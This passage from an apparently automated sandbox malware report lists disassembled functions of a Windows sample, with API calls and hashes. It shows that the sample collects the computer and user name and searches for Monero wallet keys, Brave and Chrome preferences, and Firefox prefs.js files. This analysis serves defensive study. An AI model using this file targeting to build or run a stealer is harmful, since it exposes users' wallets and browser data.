                    • Instruction Fuzzy Hash: 6FF0E2B1641308BBE7149AA8AC49FEFB7ECE705B15F305949F504E3390D5719E40CAA4
                    Function 00471190 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004878E0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00487910
                      • Part of subcall function 004878E0: RtlAllocateHeap.NTDLL(00000000), ref: 00487917
                      • Part of subcall function 004878E0: GetComputerNameA.KERNEL32(?,00000104), ref: 0048792F
                      • Part of subcall function 00487850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004711B7), ref: 00487880
                      • Part of subcall function 00487850: RtlAllocateHeap.NTDLL(00000000), ref: 00487887
                      • Part of subcall function 00487850: GetUserNameA.ADVAPI32(00000104,00000104), ref: 0048789F
                    • ExitProcess.KERNEL32 ref: 004711C6
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$Process$AllocateName$ComputerExitUser
                    • String ID:
                    • API String ID: 3550813701-0
                    • Opcode ID: fab9f6f789476cea87074006073f7014a630dfbf51f1807756438354170e602c
                    • Instruction ID: 285ff7bc2985056bd95474738ec64c5b1d3d6dc00fe7b8830795fb8d10fc7d02
                    • Opcode Fuzzy Hash: fab9f6f789476cea87074006073f7014a630dfbf51f1807756438354170e602c
                    • Instruction Fuzzy Hash: 5EE086F591420153CB0037F66C06B2E324C5704349F44192EF50882252FD1DE400876D

                    Non-executed Functions

                    Function 004838B0 Relevance: 45.8, APIs: 21, Strings: 5, Instructions: 250filestringCOMMON
                    Download Yara Rule
                    APIs
                    • wsprintfA.USER32 ref: 004838CC
                    • FindFirstFileA.KERNEL32(?,?), ref: 004838E3
                    • lstrcat.KERNEL32(?,?), ref: 00483935
                    • StrCmpCA.SHLWAPI(?,00490F70), ref: 00483947
                    • StrCmpCA.SHLWAPI(?,00490F74), ref: 0048395D
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00483C67
                    • FindClose.KERNEL32(000000FF), ref: 00483C7C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstNextlstrcatwsprintf
                    • String ID: %s%s$%s\%s$%s\%s$%s\%s\%s$%s\*
                    • API String ID: 1125553467-2524465048
                    • Opcode ID: 965db8b32ac0eec2762e3a7aa9b12b5dd468fa55fdc2691442a4b5dadc12a887
                    • Instruction ID: b39f13ef8626c6bc5478f10727f4eb11f41dae2d4786befab467f5ea60ea3518
                    • Opcode Fuzzy Hash: 965db8b32ac0eec2762e3a7aa9b12b5dd468fa55fdc2691442a4b5dadc12a887
                    • Instruction Fuzzy Hash: 51A152B2A00208ABDB24EFA4DC85FEE7379BF44701F04499DE50D96141EB799B84CF66
                    Function 0047BE70 Relevance: 37.4, APIs: 17, Strings: 4, Instructions: 675fileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                      • Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
                      • Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982
                      • Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
                      • Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
                      • Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12
                      • Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905
                    • FindFirstFileA.KERNEL32(00000000,?,00490B32,00490B2B,00000000,?,?,?,004913F4,00490B2A), ref: 0047BEF5
                    • StrCmpCA.SHLWAPI(?,004913F8), ref: 0047BF4D
                    • StrCmpCA.SHLWAPI(?,004913FC), ref: 0047BF63
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0047C7BF
                    • FindClose.KERNEL32(000000FF), ref: 0047C7D1
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                    • String ID: Brave$Google Chrome$Preferences$\Brave\Preferences
                    • API String ID: 3334442632-726946144
                    • Opcode ID: cca383e97c41c12472603594c849d3100c12a130babcc937aac4f72bddaa4aec
                    • Instruction ID: 642f45e235a3cea499554499a0034f459c3c041ffa36d000783fb0c0b17accd9
                    • Opcode Fuzzy Hash: cca383e97c41c12472603594c849d3100c12a130babcc937aac4f72bddaa4aec
                    • Instruction Fuzzy Hash: E24285729001046BDB14FB61DC96EED733DAB44304F40896FF50A92191EE7CAB59CBAA
                    Function 00484910 Relevance: 36.9, APIs: 18, Strings: 3, Instructions: 172fileCOMMON
                    Download Yara Rule
                    APIs
                    • wsprintfA.USER32 ref: 0048492C
                    • FindFirstFileA.KERNEL32(?,?), ref: 00484943
                    • StrCmpCA.SHLWAPI(?,00490FDC), ref: 00484971
                    • StrCmpCA.SHLWAPI(?,00490FE0), ref: 00484987
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00484B7D
                    • FindClose.KERNEL32(000000FF), ref: 00484B92
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstNextwsprintf
                    • String ID: %s\%s$%s\%s$%s\*
                    • API String ID: 180737720-445461498
                    • Opcode ID: 2fb591ecdc8a160adffc29cc2f45301d844a8442d62517231859a13232f3eb95
                    • Instruction ID: b4a1857187b49745dde974c516fbce93845badbe02a8502d06a27e44099a2b5f
                    • Opcode Fuzzy Hash: 2fb591ecdc8a160adffc29cc2f45301d844a8442d62517231859a13232f3eb95
                    • Instruction Fuzzy Hash: 486154F2900219ABCB24EBE0DC45FEE777DBB48700F00869DE50996141EB79AB85CF95
                    Function 00484570 Relevance: 29.9, APIs: 15, Strings: 2, Instructions: 137stringmemoryfileCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00484580
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00484587
                    • wsprintfA.USER32 ref: 004845A6
                    • FindFirstFileA.KERNEL32(?,?), ref: 004845BD
                    • StrCmpCA.SHLWAPI(?,00490FC4), ref: 004845EB
                    • StrCmpCA.SHLWAPI(?,00490FC8), ref: 00484601
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0048468B
                    • FindClose.KERNEL32(000000FF), ref: 004846A0
                    • lstrcat.KERNEL32(?,0123E758), ref: 004846C5
                    • lstrcat.KERNEL32(?,0123D620), ref: 004846D8
                    • lstrlen.KERNEL32(?), ref: 004846E5
                    • lstrlen.KERNEL32(?), ref: 004846F6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                    • String ID: %s\%s$%s\*
                    • API String ID: 671575355-2848263008
                    • Opcode ID: 6180af35ddef25957413058d136974c448de13189ba925ba31cc294ada97d09c
                    • Instruction ID: 0b2f2967e3ff3bf4a77c855449ce0ac1d60f22c74338e47a54f76d66a283aef2
                    • Opcode Fuzzy Hash: 6180af35ddef25957413058d136974c448de13189ba925ba31cc294ada97d09c
                    • Instruction Fuzzy Hash: F35156B5900218ABCB24FBB0DC89FED737DAB54300F405A99F60992150EF789B848F96
                    Function 00483EA0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON
                    Download Yara Rule
                    APIs
                    • wsprintfA.USER32 ref: 00483EC3
                    • FindFirstFileA.KERNEL32(?,?), ref: 00483EDA
                    • StrCmpCA.SHLWAPI(?,00490FAC), ref: 00483F08
                    • StrCmpCA.SHLWAPI(?,00490FB0), ref: 00483F1E
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0048406C
                    • FindClose.KERNEL32(000000FF), ref: 00484081
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstNextwsprintf
                    • String ID: %s\%s
                    • API String ID: 180737720-4073750446
                    • Opcode ID: 280667c0786b7deb9b2ecf2dcf0bc6e7c9f4d52259960734cfbcc9f69d1ccdc1
                    • Instruction ID: 81c2ba857cd64038bc1e4317fc0d0179afeeb61f1a1f50851f971a46365bc6c2
                    • Opcode Fuzzy Hash: 280667c0786b7deb9b2ecf2dcf0bc6e7c9f4d52259960734cfbcc9f69d1ccdc1
                    • Instruction Fuzzy Hash: EA5185F2900218ABCB24FBB0DC85EEE737DBB44704F404A9DB61992040EB79DB858F95
                    Function 0047ED20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON
                    Download Yara Rule
                    APIs
                    • wsprintfA.USER32 ref: 0047ED3E
                    • FindFirstFileA.KERNEL32(?,?), ref: 0047ED55
                    • StrCmpCA.SHLWAPI(?,00491538), ref: 0047EDAB
                    • StrCmpCA.SHLWAPI(?,0049153C), ref: 0047EDC1
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0047F2AE
                    • FindClose.KERNEL32(000000FF), ref: 0047F2C3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Find$File$CloseFirstNextwsprintf
                    • String ID: %s\*.*
                    • API String ID: 180737720-1013718255
                    • Opcode ID: 8bbe537c1b444f44a605fb5f18309e319b80fe4784569c3a47a9b321c5f90439
                    • Instruction ID: f3d0555e607baa478acdbb44acbc873ffda618b921fbbccb2609d0a85d104af9
                    • Opcode Fuzzy Hash: 8bbe537c1b444f44a605fb5f18309e319b80fe4784569c3a47a9b321c5f90439
                    • Instruction Fuzzy Hash: A8E1F2719111189AEB54FB61CC51EEE7338AF54304F4049EFB40A62052EE7C6F9ACF6A
                    Function 0047F6B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                      • Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
                      • Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982
                      • Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
                      • Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
                      • Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12
                      • Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,004915B8,00490D96), ref: 0047F71E
                    • StrCmpCA.SHLWAPI(?,004915BC), ref: 0047F76F
                    • StrCmpCA.SHLWAPI(?,004915C0), ref: 0047F785
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 0047FAB1
                    • FindClose.KERNEL32(000000FF), ref: 0047FAC3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                    • String ID: prefs.js
                    • API String ID: 3334442632-3783873740
                    • Opcode ID: f43c6643f9a686d5f0df614a04037eaaa1875e4fa6bf79f8f532805cc8b9649f
                    • Instruction ID: b9e227305d7ec12db72660e25e8e78cce7e808b5da569ef58bdf94472b2d9d7f
                    • Opcode Fuzzy Hash: f43c6643f9a686d5f0df614a04037eaaa1875e4fa6bf79f8f532805cc8b9649f
                    • Instruction Fuzzy Hash: E9B184719001049BDB24FF61DC91BEE7379AF54304F0089AFE40A96151EF7CAB59CBAA
                    Function 004716D0 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0049510C,?,?,?,004951B4,?,?,00000000,?,00000000), ref: 00471923
                    • StrCmpCA.SHLWAPI(?,0049525C), ref: 00471973
                    • StrCmpCA.SHLWAPI(?,00495304), ref: 00471989
                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00471D40
                    • DeleteFileA.KERNEL32(00000000), ref: 00471DCA
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00471E20
                    • FindClose.KERNEL32(000000FF), ref: 00471E32
                      • Part of subcall function 0048A920: lstrcpy.KERNEL32(00000000,?), ref: 0048A972
                      • Part of subcall function 0048A920: lstrcat.KERNEL32(00000000), ref: 0048A982
                      • Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
                      • Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
                      • Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12
                      • Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1700682894.0000000000471000.00000040.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                    • Associated: 00000000.00000002.1700666613.0000000000470000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000521000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.000000000052D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.0000000000552000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700682894.00000000006BA000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.00000000006CE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000937000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000957000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.0000000000961000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1700814341.000000000096F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701033572.0000000000970000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701132073.0000000000B0F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1701145380.0000000000B10000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_470000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                    • String ID: \*.*
                    • API String ID: 1415058207-1173974218
                    • Opcode ID: 24187e5926842584da826835f2236e4cdf51291138d0710d9cabac1e73374b40
                    • Instruction ID: 26ff79fcc37143082bf6cf4daa54e6abd2ef1a29614fbbc36f3004fc117305b4
                    • Opcode Fuzzy Hash: 24187e5926842584da826835f2236e4cdf51291138d0710d9cabac1e73374b40
                    • Instruction Fuzzy Hash: DC1232719101189AEB15FB61CC96AEE7378AF14304F4049DFB10A62091EF7C6F99CFA5
                    Function 0047DE10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0048A740: lstrcpy.KERNEL32(00490E17,00000000), ref: 0048A788
                      • Part of subcall function 0048A9B0: lstrlen.KERNEL32(?,01238FF0,?,\Monero\wallet.keys,00490E17), ref: 0048A9C5
                      • Part of subcall function 0048A9B0: lstrcpy.KERNEL32(00000000), ref: 0048AA04
                      • Part of subcall function 0048A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0048AA12
                      • Part of subcall function 0048A8A0: lstrcpy.KERNEL32(?,00490E17), ref: 0048A905
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00490C2E), ref: 0047DE5E
                    • StrCmpCA.SHLWAPI(?,004914C8), ref: 0047DEAE
